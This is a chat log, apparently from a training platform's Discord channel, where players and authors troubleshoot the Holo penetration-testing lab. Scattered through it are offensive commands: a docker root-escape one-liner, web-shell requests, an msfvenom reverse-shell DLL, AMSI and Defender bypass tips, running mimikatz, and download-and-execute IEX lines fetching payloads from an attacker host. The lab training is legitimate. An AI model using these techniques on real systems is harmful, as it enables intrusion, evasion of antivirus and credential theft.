#holo-network
Interesting...
Holo released??
my suggestion is this:
- Leave the network
- Rejoin
- Regen VPN pack
No.
worth noting it would be on http and not https
I wonder if that subnet is just dead :/
@chrome cave know any way to force a user onto a new network subnet?
I have also not specified HTTPS.
No -- it's done by available spaces unfortunately 😦
reeeeee
Skidy can shift people manually though
@bright stirrup build network tools reee
@frigid nacelle do you happen to have access to the 10.200.69.0/24 network still? if so could you check and see if it's possible to access .33?
I just opened a random task (Thanks, I’ll let myself in.) and found a very small typo in the JavaScript, it says in the code block “document.getElementbyID” the D should be lowercase and the b should be uppercase, otherwise it wouldn’t work in JavaScript
In the screenshot below it's correct, but in the code block it's a small typo
@bright stirrup please build network tools reeeeee
TAKE INITIATIVE HORSIE
GET IT DONE
Interesting here.
nah
@chrome cave mhhh there are only two people that can tell me that
Otherwise u can be pretty sure I won't do it just for the sake of being an ass
I mean, one of them promised me a network console 🤷♂️
And I'm busy racing other bicycles in Paris
Sucks to be you ig kekw
Anyway, im out, gl hf, love you all
Dw it still is
Get back here you lazy shark-headed, equine sod! 🤣
Network console!
If you give me the name of the monument i posted
Ill think about doing something about it
You have until 05'
It's easy.
I found it
Thanks Fawaz. I hate Geolocation
Yeah I am still in the 69 subnet. Let me check from the AttackBox.
.33 is down.
Fawaz wasn't a player in this tho
You gave a challenge right in front of me and expect me not to win? sheesh
thanks for confirming. I wonder if when Ashu had us clone the boxes last, they may have removed the instances attached to the test network
Gave +1 Rep to @frigid nacelle
I guess we wait for Skidy or Ashu
I could perhaps assist with that. I code monkey for a living
which part?
I did actually write some bot code I need to test/push/PR
I am.. as one would say.. horsin around
got sidetracked and forgot
Aye dope
but yeah, in all seriousness, I'd be willing to help with code stuffs
Cool cool! I have a few projects for the bot, I might contact you about it when it'll be in motion
cool. Yeah, I saw you'd posted something about a total rewrite, so i sorta stopped what I was working on and then forgot cuz I'm a knucklehead
So I could possibly do the network soon or what does that look like?
we need to wait for a thm admin to be available to assist
Okay.
Yay holo is up!
yep, it's a sub only network
Ok cool
Holy shit
I go to work for the night and I come back to everyone realizing Holo is a thing
Christmas in July! 🥳 
I’m going to bed don’t break anything too badly
too late
it was already broken dad 
Wait why 
👀
If you find typos in holo where is the place to report them? :)
I got a DM from a remember I don't know, with a pretty suspicious link. Who and where do I report him to?
@chrome cave I think you dealt with something like this just now
Gimme name
sven1988#1781
It's stupid that they think it's actually going to work especially in a community like this
Anyway, thank you my people. Have a good day
network is down
can't even ping the machines after the boot and there are not enough votes to reset it
if you guys are having issues, would you mind leaving the room and re-joining it? 🙂
it works, thanks 🙂
In this channel. 🙂
Holo and Wreath, yes. Throwback, no (as it is a separate premium network). 🙂
I found one small typo in task 5, the "are are"
In task 8, are we looking for subdomains in vhost scanning or FQDNs?
What are the two other domains present on the web server? Format: Alphabetical Order
Look at the http title on the machine then fuzz that domain, it's FQDNs not IPs
I got a ton of subdomains, added the primary domain to the hosts file and then scanned on that
Yes, I just worked that out myself as I got a bit confused
is it ok if I DM you? @stable dune
Sure
thanks 🙂
How old is the Holo network? I can't ping any machine even after a reset
tried leaving the room and joining back
Which machine are you trying to ping?
L-SRV01
I see you have the Throwback tag on you, is that network stable if I buy that?
Throwback is a completely different network and yeah it was pretty stable when I did it
is holo new btw?
Yep
But it's only soft-released as it still hasn't been fully tested, as a few other testers haven't completed it
that's why maybe
got it
even when I am trying to find vhosts, the webserver goes into a filtered state and drops every web request
You may have multiple vpns running
Type ip addr and see if you have more tun addresses than you should
Hmm not sure then I would check to see if I could ping it but i’m out atm
But it should ping
Hi there, would you mind leaving and rejoining the room please?
tried that, but still had issues
Have you regenerated your OpenVPN config file?
Are you on a new network (does the network map show an IP with a different third octet?)
are you connected on both the VPN on your machine, and the AttackBox?
You can't have both running at the same time.
nope
I'm actually on that instance right now and everything seems to be fine
If you left and joined the room, you'll need to terminate the AttackBox and then restart it:)
got it :), will try that
This isn't a big issue, but in task 8, there's a sentence that says "We can utilize Gobuster again to identify potential vhosts present on a web server." But, gobuster and wfuzz aren't introduced until task 9. I just thought I missed something from the previous task based on the verbiage.
oh, that was just me reordering tasks and breaking them up
didn't realize that was in there still
@wind bobcat you can't hide from me by just changing your name. fix it fix it fix it
I'm sleeping
Pretty sure I’ve pinged you a good 10 times today alone. gl trying to find them all
Is there supposed to be an alpine image on the webserver or do I have to upload it myself? I can't seem to get the SUID privesc to work. (Task 19)
you shouldn't need to upload an image for the suid exploit to work -- check out the gtfobins suid
https://gtfobins.github.io/gtfobins/docker/
wait a sec
they changed it
smh
Rip
if you run a docker images you should see all the images installed on L-SRV01
you can replace alpine with one of those
this should work:
docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh
Thanks! I thought I might have to do something like that but I just wanted to double check.
So they recommend a Windows VM for developing .NET. But this expires soon. Is the recommended way actually getting a license for a developing Windows VM?
If that is the case, I think I will just install Visual Studio in my Windows host ...
👍
I don't think I'd personally ever buy a license for deving stuff unless my employer is paying for it
but you can find keys that aren't volume license that are cheap that are completely fine
So we called Microsoft after some viewers commented that the sponsor SCDkeys as well as other third party sellers weren't legit. Well the answer may shock you...
Use Coupon BFTYC for 30% Off (until 31st of December, reverts to 18% after the end)
Get a Windows 10 Key for CHEAP(12USD): https://www.vip-scdkey.com/sk/BFTYC
Get a double key (cheaper...
so soft release? 👀
yessir
aah ill finish soon 
You were too busy posting cat pictures 😄
That's important work.....
Having trouble using gobuster to look for vhosts. Every time I run it I get a timeout error. I have even waited for a network reset. Can anyone help? My hosts file points to holo.live with my 10.200.x.33 IP
OMG HOLO IS RELEASED
try -u http://holo.live and add a timeout flag: --timeout 20s
That’s what they want you to think 👀
is ping disabled in the machines?
because neither .30 nor .33 responds to pings
tried rejoining the room
and regenerated a new VPN file
iirc 30 won't respond to pings since it is in the "internal" side of the network, not sure about 33, should work fine i think
Thank you, that was it.
Gave +1 Rep to @wind bobcat
In task 9, what is fuzz? What exactly is the question (What file loads images for the development domain?)
I'm on the dev domain, am I looking for an image file or a PHP file which contains it?
this is the only subtask I'm left with in task 9, can't get the question
ok
got it, thanks 🙂
I think I am missing a flag. Under Task 14 the last question is Submit the flag on L-SRV02, but as far as I have seen nothing in that task has led to a flag. Am I missing a step? I have looked in the .dockerenv file and under /proc/1.
Have you looked for a user flag
I have not. I will give that a try.
Thanks, I am stupid, I even saw that when I got into the server, but I did not pay attention to it. Thanks again.
Gave +1 Rep to @lone spruce
.33 is the only machine you should be able to access - if you cant, reset
I knew someone would mention holo here 
hey, I need help in Task 18, I followed the exact same steps but am unable to get a reverse shell
can you execute individual commands?
yes
I would try downloading a Meterpreter reverse shell into /tmp/ and trying to execute it
you may have better luck with that
thanks , I got the reverse shell 🙂
yeah that is a bit of an advanced way to get a shell
def easier workarounds but it's a cool thing to show off
yes
Is the network down? I could fuzz subdomains, but now while trying to do directories gobuster keeps giving me "unable to connect to……" "client timeout exceeded while waiting headers"
Have checked access and I'm connected to holo through VPN
(Otherwise I wouldn't have gotten the subdomains lol)
Have tried increasing the timeout, still unable to connect ☹️
so it finally released? publicly
does this count as a fanart submission?
al thanks
Gave +1 Rep to @wind bobcat
I took a 6 month subscription in December because of holo. But it got released now and I don't have a subscription 😫
holo is cancelled
how am I supposed to know via this method?
I got the param via the source code, but want to try out the same method using wfuzz
so FUZZ=ls+-la should have a longer word/char/line length
because it's the whole HTML webpage plus the contents of ls -la
i think you could but it might be a hassle deeper into the network if you're not working on your own machine
Ok, thanks. It's just because I don't have my own PC
to run a VM on
so I use the AttackBox 🙂
btw, what's with all the vargs
I don't know and at this point I'm too afraid to ask
lol
guys one question. if I am in the room now but in a few days my subscription will end
so with the sub the room does too?
we don't know yet
where's Banana Varg
I did make a custom wordlist with the ONLY word being cmd; it showed the same chars. I'll try that again today
thanks :)
When ur sub ends ur access to subscriber-only rooms will also end
ik tho, I was just confirming for holo
WE GROW STRONGER EACH PASSING DAY!
Can someone confirm if Task 12 (RCE on site) is working?
well guys
I added holo.live to the hosts file but
browsing it shows page not found
but it pings
it's weird, idk what's happening
can anyone help?
the site doesn't load once I get a shell
I mean if I ctrl+c
then it takes years to load
new tab
this takes yearsssssssssss
neither admin
the port scanning script
Should be www.holo.live with the other subdomains in the hosts file, not just holo.live, if I remember correctly
oh right thanks
Gave +1 Rep to @cinder notch
Np
for me admin page takes years to load
I think my solution to that when it took forever to load was to fully close my browser and reopen
I don't know why it does that sometimes but fully closing and reopening seemed to work. I don't remember if a hard refresh worked though.
for me its a second
lol
reconnect to
the vpn maybe
tried all that
oh will try thanks
Gave +1 Rep to @cinder notch
Is it supposed to display a page when logging in, because I don't get that 🤔
how am I supposed to find the IP address of the machine without looking at the graph?
docker
Nmap?
Docker is also usually in a certain subnet (not the case here)
the subnet won't respond to ping scans, right
I am guessing you are doing it through a proxy, in which case; make sure you are doing a handshake
It must be broken or something 🤔
any hints on task 12 RCE? I tried it on img? to fuzz but not sure if that's right. Stuck on it for 2 days
I tried intercepting the request in Burp as well, tried whoami but that didn't work
waaaaa
network just restarted, can anyone access the admin subdomain? I am not able to
been 15 min since boot
same am also not able to access
it doesn't exist because it's not on the same server lol
and as for not being able to access it, I honestly can't provide any other advice other than reboot?
hello. the admin site login doesn't seem to work. responds with valid then redirects to the dashboard, but doesn't set a cookie or anything
any request to the dashboard just redirects back to login
this would be task 12 - I guessed the answers but can't confirm them alas (ideally I shouldn't have just guessed them)
also should note that the command to unzip the test site is not quite correct - doesn't put the unzipped files in the right place. trivial to fix though
tried resetting, my friend also had the same issue. he gets x/19 and I get 2/3 votes; is this different for everyone?
i think i did try that, thanks will try again after a reset
Gave +1 Rep to @lone spruce
The reset vote requirement varies between the subnets you get dropped into, more people on one = more votes required
oo okay thanks for clarification
Gave +1 Rep to @river cradle
well, yesterday I connected to the VPN but
the request was not completing
I mean it was not reaching the website or even the IP
but it worked some hours before
anyone who can help me with this part
@haughty jacinth this message is relevant
it worked , previously I tried with only "ubuntu" forgot to mention the version / TAG
It doesn't work for me either
any nudges please!!
it does
Hey everyone, a quick question: for those of us with shitty PCs, what's the recommended way to compile C# for the tasks?
i mean do it with some online compiler
checkout https://replit.com
it could work
ig
I have a shitty 4GB i3 with some 1TB HDD 🤡
Thanks man.
Gave +1 Rep to @livid shoal
Hey, did anyone manage to get root on S-SRV02? I've got root on the DC, but when I tried to connect to S-SRV02, all I ever get is STATUS_TRUSTED_RELATIONSHIP_FAILURE
Hey, is the port 80 of L-SRV01 open? All my Nmap scans show it's closed
I'll take a look at it later tonight. We had some issues with it failing towards the end of testing. I'm not sure what's wrong with it, I might need to rebuild it
what network are you on, I might be able to do a hotfix for you?
Thanks! I am on the 10.200.69.0/24 one, if that's what you mean
mother-
@frigid nacelle would you be willing to toss me over your VPN pack by chance?
If you need one for 200.69 i can send you mine
@river cradle yes plz bb
ah okay
i'll need to fix this box in dev
the reason it's dying is because of lack of memory
attempted to RDP in 2x and it died both times
1st time it straight up couldn't handle the logon process
2nd time it was able to handle it and couldn't start PowerShell
after attempting to start PowerShell, it died
how do I get started with holo? I'm connected to the VPN but no traffic leaves through the VPN interface tun0 - I checked with tcpdump. not sure what's going on...
I tried scanning the 10.200 range and the 192.168.100.0 range
ok, regenerated my VPN and it seems to be working now
Hello! I'm a bit confused about how to perform Task 17. This is what I'm being told meanwhile. Could someone clarify?
yes. on 192.168.100.1
I didn’t set that one up or look over the instructions for a while but I believe there are two different SQL servers on it? Make sure you’re accessing the right one
oh alright. thanks. let me check.
Gave +1 Rep to @lone spruce
Is there any chance for a reset on the network please? The initial web server has crashed. 10.200.106
this should be the right one
worked for me
also
a doubt for the AMSI bypass
we need to spin up a Windows VM?
locally
ah okok
The network only seems to allow for 10 gobuster threads. Is this because other people are on the machines too?
Or is there a network issue!
likely too many people per subnet
honestly, I bet that's what's taking the web server down
I did run ferox buster against it and that’s when it crashed. It’s ok now as the network went to sleep.
I’m running gobuster with 5 threads right now. It’s slow on the main VHOST but on the others it runs with fairly decent speed on 5 threads
Running all consecutively (although I wasn’t to begin with)
I've just added a note on the WFuzz/GoBuster tasks requesting users to decrease the thread count
I thought so. Worst case, I'll have Skidy bump the resources
As a tip could you include adding | tee gobuster-vhostname.out to their command? It clears all the error messages and gives you nice output
May be handy and prevent you getting called upon often
@wind bobcat can you check host 10.200.69.33, none of the web resources are running on it
if the webserver is dying from everyone hammering it with requests, I can't imagine what pc-filesrv01 will have to go through when everyone starts doing their part on it
Yeah please reset the network or something. I guess we need two more votes. Can't even get started on the network.
if you're asking people for resets, mentioning the subnet you're on would be 👌 since there are separate reset counts for each one
Task 6 compiler with the Windows virtual machine
Is that gonna be a blocker if I don't set up a VM for Windows?
Or I can just skip it to continue the rest
you know, I think I might know another reason as to why the web server might crash - a user could also be stopping it
which is no bueno
I'll make sure to add that in the tasks
since it's running in a docker container, it's easy enough to kill..
I mean it’s not necessarily going to block you but I also don’t suggest skipping it. It wouldn’t be in there if it weren’t critical to the rest of the network
gotcha, thank you
Gave +1 Rep to @lone spruce
woah i had 40
lol
my network is kinda stable
will an azure windows 1gb ram vm serve the purpose too?
Hello. I just started the Holo lab and when I use the nmap command the result is 0 hosts up, but the network state is running 🤔
It's probably because the initial servers are down
What's your subnet?
You might request a reset
Which reminds me, people in 114 subnet?
are there different numbers of people in different subnets?
Might be
I can't even get started tbh
how many votes are required for your subnet?
any problems? or just didnt start ?
I need two more
Well the initial webserver won't start
Like there are supposed to be 3 open ports
And I'm getting only 2
Port 80 is closed
😦
ah maybe some problem with 114 then
115 is stable
Yeah a lotta people who are starting the network now are facing the same issue
how many votes are required in your subnet?
btw
2 more
aahhh same iirc one person had 19 in it
which ones are open?
22, 33060 I guess
woahh strange
yea some exceptions maybe :( you need a reset
Yeah 😦
tho in the meantime u can have a Windows VM ready. you'll require it ahead if you don't already have one
I have a shitty PC but I got a Windows 7 VM with VS all booted up
woah nice
but but
you need windows 10 ig
Windows 10? My PC will die
lol my pc died too so i spun one in the azure cloud
I have a Windows10 VM on a Ventoy-USB if that helps
How much does Azure charge?
it was free for me ( education plan )
How do I avail that?
two small 1GB RAM VMs (one Windows and one Linux) always free as long as you're a student
yea its awesome
Thanks man
welcome :)
Same here, I know (from the task description) it should be there but it isn't
hey support, it is not cool if the service crashes and you have to wait for 17 more votes before a reset.... at least make sure the service restarts itself...
yeah i get it, i don't think it was supposed to end up with this many people on one subnet
while i'm not support i can try to apply a temp fix on 10.200.69.X while reset votes are still gathering
:80 and internal http should be up, still need a bit to get the other mysql running
sheesh your subnet got 19 people?
Hi Szy, it is working now, thanks !!
Gave +1 Rep to @river cradle
Not sure, at least I needed 17 more votes for a reset... but @river cradle fixed it
woahhhh thats insane
mine got 3
for some weird reason a bunch of people were dropped into the testing subnet
oops
but yeah the foothold should be working fine now on .200.69.X, if it breaks again i can probably try to fix it again if spooky/cry aren't available
👀 anyone know why it's happening?
the machine is windows server 2016 datacenter
and rtp is enabled i checked it
tried turning the vm off and on? 😄
well yeah i restarted it. its deployed on azure
ok now it
works
weird
thanks anyways
machines do be weird sometimes
you sometimes just need to give them a (virtual) kick to get them running
😮
guys can anyone help me? I am really struggling with this part. the AMSI bypass is kinda new and advanced for me :( no matter what I do it always gets detected :(
tried changing the variable names to some random stuff? 
still.... 🥲
Did you follow the bit about type acceleration? That's all you need
oh sheesh 😅 i thought it was optional
lemme go see it again
done thanks
Can anybody try to run masscan on their respective Holo 10.200.x.0 subnet and show me what they get?
The Linux serv is fine and works for me, but for some strange reason masscan finds jack shite
segmentation. that's why lol
and the .x. is something you should be providing, it's important we know which network you're in for solving any potential issues
There is, ofc, a non-zero chance that this is just me being an idiot.
I'm not too familiar with the tool
that many packets per second is incredibly high
there's only 6 hosts in the whole subnet, that's the rate you'd use if you were trying to scan the whole internet lol
by default masscan runs at 1,000pps, you've upped it all the way to 100,000pps
A very fair point ; lowering the rate doesn't seem to change anything so far
it wouldn't surprise me if the web server crashed or just completely missed it altogether
if you can access 80 on .33, then it's still alive, but if not, the server probably crashed
It's still alive, I keep an eye on it after each scan
(I also thought I'd crashed it, doesn't seem so thankfully)
does nmap produce the same results?
I wonder if masscans timeout is lower than nmaps is
you could try the --wait 30 flag
still pending fix, if you DM me your THM username, I can verify that you've submitted the DC flag and give you the S-SRV02 flag
I'm stuck on task 17 Docker Breakout. I can access the DB, but when I use the one-liner to create the PHP file from SQL I can create it in www/html/, but when I try to access it with curl 127.0.0.1:8080/shell.php it just fails, and if I use the IP address of the Linux machine then I get the same www-data user in the output.
if I try to do it again, there is a file though. Tried changing file names but the behaviour is the same.
you'll get the same user because you're running in the context of the same user -- www-data
you're not doing anything wrong
commands are being executed on the internal web server as www-data
I logged in as admin under MySQL
but then how am I supposed to priv esc as root
once you receive a reverse shell on 192.168.100.1 (10.200.x.33) you'll need to perform basic enumeration to elevate privileges.
I found active ports, I'm just going by the tasks. So right now the main point is task 17, what can I do here?
yes -- task 17 going into 18.
and privilege escalation on L-SRV01 (not the docker container) is outlined in task 19
but on task 18 I'm supposed to have an RCE on the host which I don't have
can you help me just a bit, if you can join VC?
you do have RCE on the host
you're just slightly confused because the commands are being executed as the same user
if you run a different command, for example, hostname
you'll see vastly different results
Yep, so if you do:
curl http://192.168.100.1:8080/shell.php?cmd=hostname
you should see different results
yup
exactly -- so you're executing commands on a different host, not the container
got it
your next step is to get a reverse shell (outlined in task 18) and after you do that, you can proceed on to elevating privileges on task 19
thanks 🙂
yes
can you guide me through it?
try that exe in there
thanks a lot
iirc you might need to specify an executable after it
oh
the arguments for Defender Check are weird
they totally could have done a help page for it ;p
switched to threatcheck
did that end up working? threatcheck is miles better
pog
threatcheck is better, anyways
not because Rasta Mouse built it or anything and we simp for Rasta
lol
@wind bobcat also a question. do I need to use the C2 or can I do it without a C2 as well?
for this
one particularly
you can do this without a c2
a side goal of our networks is to teach a C2 framework
or at least get you to try to use one, lol
everything that can be done with a c2 here can be done without
in the future, I'd like to build a network that focuses on Cobalt Strike
I'll need to ping some people in my space to see if we can pull this off
honestly, hands down holo is a really great network. you and cry have put in some real effort. thank you so much 😄
👀 also doesn't Cobalt Strike cost a fortune for a license (dk much about their trials)
yessir
Trials it might completely depend
as long as someone at Help Systems hopefully agrees to work with us, it might not cost anything
oh great then
@wind bobcat one last doubt (hopefully 😅): in the room it says .exe. do we have to convert the PowerShell file to an executable one?
summon @lone spruce
Getting a Trust Relationship error when trying to RDP to S-SRV02. I am using domain admin credentials. I think a reset is needed?
that unfortunately is a known issue. We're waiting on THM to get a clean environment spun up for us so we can apply the fix. If you DM me your THM username, I can verify you've submitted the DC flag and give you the S-SRV02 flag
if your name happens to start with M and ends with 0, check your THM PMs
So I just started with the holo network
And in task 8 the Syntax for wfuzz is given as :
wfuzz -u <URL> -w <wordlist> "Host: FUZZ.example.com" --hc <status codes to hide>
Won't it be:
wfuzz -u <URL> -w <wordlist> -H "Host: FUZZ.example.com" --hc <status codes to hide>
it should be task 6, shouldn't it be?
What? Where
Mwah
shell.exe
i have a undetectable ps1 file
only
not exe
yet
Umm any mods there? I might have something to report.
spooky is around
why is the timespan just 10 days for holo
You can join back; it's because a lot of people will be joining and so it will free up space on the networks
will our progress remain in the network?
Yep
perfect 🙂
Anyone could help me
I am trying to execute my revshell binary (in the local network) but get this error, what does it stand for?
Listener?
I am trying to execute it with default sourcecode (Executor and Stager) and without defender, anyway this error
wait 👀 u converted the ps file into an exe?
No, Binary
ok I am way too confused on how to use covenant
@wind bobcat can I ask some things if u are free?
Unfortunately, Cryillic is in charge of those sections. I'm 7-20 | 44-47
oh okok
depending on the question i might have the answer @livid shoal
szy is resident c2 expert
nah that'd be fawaz probably
maybe for cobalt strike
i only touched the unnamed once, and empire also once during throwback
anywhere else i just used covenant 
broke on me multiple times
@wind bobcat which one are you going to use with very advanced attacker labs? 
yikes
ill be honest, deep network segmentation is unrealistic except in ICS/SCADA networks
👀 so I generated the ps1 AMSI bypass payload which is not detected by antivirus. now how do we use that? I mean what I got was
generate a php shell which in turn will download a binary which will open a reverse shell
and then we have to execute the payload we created earlier??
is the sequence right?
but often at times, they'll just be completely airgapped
you can do it like that with the php file giving you a revshell and spawning a covenant grunt from that, or you can try executing the grunt stager directly from that php file (obviously with the amsi bypass embedded)
both of those might result in pretty big files because of how obfuscation works.
what I like to do in labs like this is host the powershell payloads/stagers separately and in the "exploit" just place a snippet that triggers its load
usually it looks like this: I slap the amsi bypassing portion in the first part of the file and right below it just copy the powershell stager, optionally obfuscate that, host that on a webserver (you can use the one embedded in covenant) and invoke it from the exploit/whatever using IEX(New-Object Net.WebClient).DownloadString('http://yourip/file.ps1')
oh so no need to create a binary? just a normal PowerShell file will work with the AMSI bypass in the first half and the stager in the last? and downloading that from a php shell?
you can take multiple approaches, you can also make a binary, download it and run from the php file
there's no single correct way to do this
ah and also if I included the stager code at the end, it won't get detected by Defender?
from what i understand if you don't place it on the disk then it will only go through amsi
ok thanks lemme try
lmk how it goes
so we figured out what is up with .69
there happened to be 145 users in that one network
lmfao how
autoscaling go brrr
@bright stirrup holo broke plz fix
yeah its broken
I can't access the DC webserver
there is no dc webserver
the only webservers are s-srv01, l-srv01 (technically l-srv02)
sorry its accessible
yeah
Task 30 -- Dead link
yea ^
I'll try it today. I slept last night. one more thing: do I need to proxychains the C2? I mean how would it reach me? or does just running chisel on the client and server side get the job done?
there's only network filtering inbound, not out
so as long as an internal machine initiates the conversation, it should be fine
ah alright thanks
-undelete 1
Up to 10 last deleted messages (last hour or 12 hours for premium):
none...
nope, no success with this one. https://gist.github.com/mananchawla2005/737db1d2f0b0783ac7ad99a534771fff that's my PHP script which downloads the file named gg.ps1 from the HTTP server set up on my machine (the file is being downloaded, it is shown in the logs). So as we discussed I added the stager code generated by the C2 after the AMSI bypass code like this -> https://gist.github.com/mananchawla2005/b82be3800460adf750cee5c134f17e83 but the file was requested and no grunt was being created. Then I tried replacing the stager code with a normal reverse shell payload https://gist.github.com/mananchawla2005/d395b66cc65fe21db8814838f25d3725 but still no shell?
Am I doing something wrong? also I added the proxy in my browser to access the webpage, so I can access either the website or the C2, not both at the same time. any workaround for this?
U scared me, I was like "Why on earth am I pinged in holo oh god "
In task 22, digging a tunnel - we don't have access to the Windows server; if we have to download chisel there and sshuttle, we already have 2 Linux machines down. I'm already on L-SRV01. I think I'm supposed to get control of DC-SRV01 but what's the point of chisel then
I'm confused in it
we do have access to windows server there
its in the network
can we rdp that server
if we get a shell there do some priv sec bypass av, yes why not lol
can't even ping windows network
I'm on linux machine
port 80 is open for that
and now for chisel i'm supposed to have access on DC-SRV01
or we are accessing some service of DC-SRV01 on L-SRV01 ?
nopes. chisel is just creating a proxy so that the networks which are accessible by the linux machine are accessible by us also
its just in network
anyone else notice that a scheduled task is missing on PC-FILESRV01? or is it just me
anyone facing any problem with dirsearch while fuzzing? I'm using the default 30 threads; still, the fuzzing freezes after a while
I can't find any internal port open in l-srv01
What version are you using? Is the server still alive? Network connection no problem?
No problem with network connection. I just cant fuzz the server i tried gobuster and wfuzz too
No tool works?
Kinda, I mean when I tried dirsearch it started off good but after a while the request count came down to like 5 and it froze
It happened every time I tried
Can you fuzz with gobuster or wfuzz?
@vestal furnace I believe you are using an old version of dirsearch
I'm using dirsearch v0.4.1
I released v0.4.2
Will update it right away
Hi, can someone take a look at PC-FILESRV01 on subnet 10.200.111.0/24? I don't think it's behaving properly based on the instructions.
what happened?
@livid shoal well, for one I can't access it with WinRM as per the instructions, but no problem accessing via RDP; then the DLL injection is not running because the scheduled task is missing, unless I'm just stupid, which is probably the case
same, even I can't access it via WinRM
😶🌫️
crackmapexec shows valid hash but
evilwinrm says
authorisation
denied
something like that with u too?
@livid shoal yeah, the user doesn't have the permissions, but you can access it with RDP
woah lemme try that
through proxychains
PrintNightmare is the latest exploit
not the intended way for the network
bruh
ikr
😂
leave them a nice message and disconnect
seems like the intended way is broken anyway
many have done it already
let me try
if my subnet
is good or not
also did u get covenant working?
i did the raw way
i mean simple reverse shell
for PC-SRV01
?
I just made a PHP script that fetched a non-detected nc.exe and created a revshell
the intended way is too complicated
naah it's fine but for some reason it was being detected by defender every time
i just used a simple rev shell payload
and put it at the end of
amsi bypass
and then just executed the powershell file
this is another way to do it
then I did Add-MpPreference -ExclusionPath "path" so I could run mimikatz
ah I just disabled the antivirus
lmao
or IEX(New-Object Net.WebClient).DownloadString('http://10.x.x.x:3333/mimikatz.exe') should also work with amsi disabled
it just directly executes from stdout
yes
nice, ill have to remember that one
that's why I was able to execute the ps1 file and get a rev shell
the first part had the AMSI bypass and I appended it with rev shell code so simple it doesn't get detected
szy told us about this trick
😄
here he is
That won't work with exes
Invoke-Expression / IEX is like eval for PowerShell
yeah, DownloadString kind of makes it sound like it needs a string
To run mimikatz from memory you'd need a wrapper script which in turn can be powershell
so base64 encode it?
I have one like that in my collection
how do you decode into memory?
Base64, gzip, xor, you name it
So depending on the binary type you might have different methods
For c# ones you might just only need to load their classes and invoke straight from powershell
szy also one doubt: when I placed the Covenant-generated stager it was being detected by defender and not executed, but when I placed a simple rev shell script it gave me a shell?
any idea why it was happening? I had to stick to a netcat shell
For normal binaries you might need to load them into memory and execute them; the way the script I have is doing it is using reflective PE injection
Hm, how were you placing the stager code?
that was executed remotely with IEX?
I don't think it should do that, but it is possible I was wrong and defender does scan it too
@river cradle can I DM you?
yea that's what I thought, but when I got the reverse shell I disabled real time protection and AMSI and again tried to execute the binary generated by Covenant... still no shell, it executes and finishes with no output. It's weird, idk why
Sure
Hi everyone! When the access days are over, is it possible to re-enter the hall?
Yep
You’re able to join back
AD module is not present
:(
is that a bug?
for anyone having the same issue
can follow the steps here https://github.com/samratashok/ADModule
@nocturne pulsar did u find the dll
can you give an idea where to look for it 😅 I am still not able to find which is the vulnerable application
in Get-ScheduledTask ig?
right?
look in task manager
ohhh
there will be something that is running like 30 times
yes lol I wondered
that why
ohh so that is it
Hi, I'm connected to the Hololive VPN network, but I can't ping servers. Can somebody help me plz?
I was an idiot and made an x64 DLL, when it was clear as day that I should have made an x86 one
but wait that isn't the answer
🤔
for the question
task
nvm
got it
I'm stuck on task 23, I've done pivoting. Can't ping the Windows server from anywhere actually, neither from linux-1 nor the attacking machine even though the network is up.
and I really don't have any clue where I'm supposed to get a foothold on DC1.
What exactly am I supposed to do on task 23?
You won’t be able to ping the Windows machines
bruhh
AV
then what exactly do I have to do on task 23?
23? set up the C2
if you mean 22 then you're supposed to set up a pivot to be able to reach the internal network
we can't ping it, justified with AV. We can't open the website on that AD server. How exactly are we supposed to go ahead in the network?
which server are you trying to reach?
yeah but which one, there are couple
central dc
were u able to run procmon? because for me it says it should be run from an admin account
DC-SRV01
DC won't have a webserver, if you want to check if it's available scan 135/445
tried it, didn't get any machine up
after the pivot you're supposed to set up the C2 and then you'll be instructed to start working with S-SRV01
you're supposed to do that on your own machine, preferably a VM
oops
ok, will try it, maybe I am just exhausted
will the file from Kaspersky's website be ok to make the malicious DLL?
or do i need to download it from the machine itself
use msfvenom
you need that file to figure out what DLLs it can't find
yes, so can I download a copy from Kaspersky's website
?
to view the processes
not sure if its the same
it could be a different version
best to use the one on the machine
do you have a copy? dk how to do that. I just have RDP
I used scp on the Windows machine
you can scp it back to your own machine
you could also stick it somewhere where you can get it with SMB
@nocturne pulsar can I DM u?
yeah
thanks! 😄
Gave +1 Rep to @glacial temple
I placed every possible DLL I found but still waiting for a shell? am I doing something wrong
what DLLs did you find?
It can be found in pretty much the first result in a decent google search
kavremoverENU.dll it was
I got a shell once in task 12, not getting it now.
How did you create your dll? Does your dll bypass AV? Have you tested it on a separate system as recommended?
well I used the msf command as it was shown. not sure if it bypasses the AV.
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x LPORT=7777 -f dll -o not_malicious.dll
this one
admin webserver is down? it's not loading
@lone spruce
the DLL was not deleted and no alerts were created, so I thought everything worked, my bad
Task 34, "To download our malicious grunt, we can set up an HTTP server on our attacking machine using python, updog, etc and use iex or Invoke-WebRequest to make a remote call to our server. Find the download payload below." is written twice
Anyone can confirm?
Maybe I don’t know there’s a lot happening
There are probably several Holo networks, you should tell the IP
it can help if you provide more detail: subnet, last reset, etc
tho can you give an idea as to what we can do to make the DLL undetectable?
admin.holo.live, are you guys able to login??
I don't think anybody is able to help if you don't provide an IP
L-SRV01
69
yeah that's the problematic one
I just got a shell on S-SRV01 with a one-liner reverse PowerShell, skipping the whole Obfuscation/AV-Evasion stuff. Is this expected to happen? Is the whole AV Evasion stuff there because the Covenant payload raises lots of flags?
I can't login to the admin dashboard on 10.200.69.33
👀 you are not alone. tho u must have done the AMSI bypass?
Nope, nothing
whaa-
dm me the credentials you're trying on it
maybe someone disabled amsi before you
I guess that could be
totally offtopic but I am a big fan of you 🙌
^^^
🙂
@river cradle szy a little help 👀 can you tell me something to bypass AV for the DLL? stuck on it for quite a bit
can't help with that atm 😅
ah np
That’s already extensively covered in the tasks
well
I did with the
powershell
script
not sure about this one
I mean it went over extensively how to clean Covenant so
😅 about that, I wasn't able to use Covenant. it creates a lot of red flags so I had to fall back to a simple reverse shell PowerShell script with the AMSI bypass ahead of it
of course it creates a lot of red flags lol that’s why you clean it
also idk why when I got the shell I tried executing the Covenant binary, it just executed but didn't create a reverse shell
av was disabled
still
Could’ve been a bunch of reasons who knows
yea
and by test I didn’t mean test against AV
have you tried running the application on a separate machine and seeing if the DLL gets called?
ie popping a shell on your own windows VM
nopes I didn't because it was a remote machine. lemme try it once and I'll reach back to you for further help
well no shell, but when I place the DLL, it doesn't even start the GUI, and runs the process in the background. but yea no idea why, but no shells
poppin up
I tried getting a reverse shell from the same machine to the same machine
Side note for those who have gotten every flag except S-SRV02 - I'm actively checking to see who's at 105/106 and will DM you the flag on THM until the issue gets resolved 🙂
